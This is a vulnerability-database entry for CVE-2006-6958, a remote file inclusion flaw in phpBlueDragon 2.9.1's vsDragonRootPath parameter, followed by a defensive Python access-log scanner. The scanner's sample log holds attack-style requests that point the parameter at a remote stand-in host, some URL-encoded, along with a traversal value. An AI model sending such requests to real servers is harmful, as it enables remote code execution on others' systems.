CVE-2006-6958
phpBlueDragon 2.9.1 - Remote Code Execution via vsDragonRootPath Parameter
Exploitation Summary
EIP tracks 1 public exploit for CVE-2006-6958. PoCs published by Shm.
AI-analyzed exploit summary
This exploit demonstrates a remote file inclusion vulnerability in PHP Blue Dragon CMS by manipulating the 'vsDragonRootPath' parameter to include arbitrary remote files. The attack leverages unsanitized user input to execute malicious code in the context of the webserver process.
Description
Multiple PHP remote file inclusion vulnerabilities in phpBlueDragon 2.9.1 allow remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter to (1) team_admin.php, (2) rss_admin.php, (3) manual_admin.php, and (4) forum_admin.php in includes/root_modules/, a different set of vectors than CVE-2006-3076.
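One way to hunt for this in web server access logs, as an added example that is not code from this page or from the published PoC: it flags requests to the four listed scripts that carry vsDragonRootPath in the query string. The combined-log request format, the function names and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The four scripts the CVE description names, all under includes/root_modules/.
AFFECTED = {"team_admin.php", "rss_admin.php", "manual_admin.php", "forum_admin.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with scheme:// or // points the include path off-host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-url' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    path = unquote(target.path).lower()
    if "/includes/root_modules/" not in path or path.rsplit("/", 1)[-1] not in AFFECTED:
        return None
    verdict = None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key.lower() != "vsdragonrootpath":
            continue
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE_RE.match(unquote(value)):
            return "remote-url"
        verdict = "param-set"  # heuristic: a client supplying this variable merits review
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that touches the parameter."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log (documentation addresses and a reserved hostname).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /cms/includes/root_modules/team_admin.php?vsDragonRootPath=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2007:10:00:05 +0000] "GET /cms/includes/root_modules/RSS_admin.php?vsdragonrootpath=http%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2007:10:00:09 +0000] "GET /cms/includes/root_modules/forum_admin.php?vsDragonRootPath=../ HTTP/1.1" 200 87',
    '192.0.2.13 - - [01/Jan/2007:10:00:12 +0000] "GET /cms/index.php?page=news HTTP/1.1" 200 4096',
    '192.0.2.14 - - [01/Jan/2007:10:00:15 +0000] "GET /cms/includes/root_modules/manual_admin.php HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Only the query string is inspected; a parameter sent in a POST body does not appear in a standard access log and needs request-body logging or a WAF rule to catch.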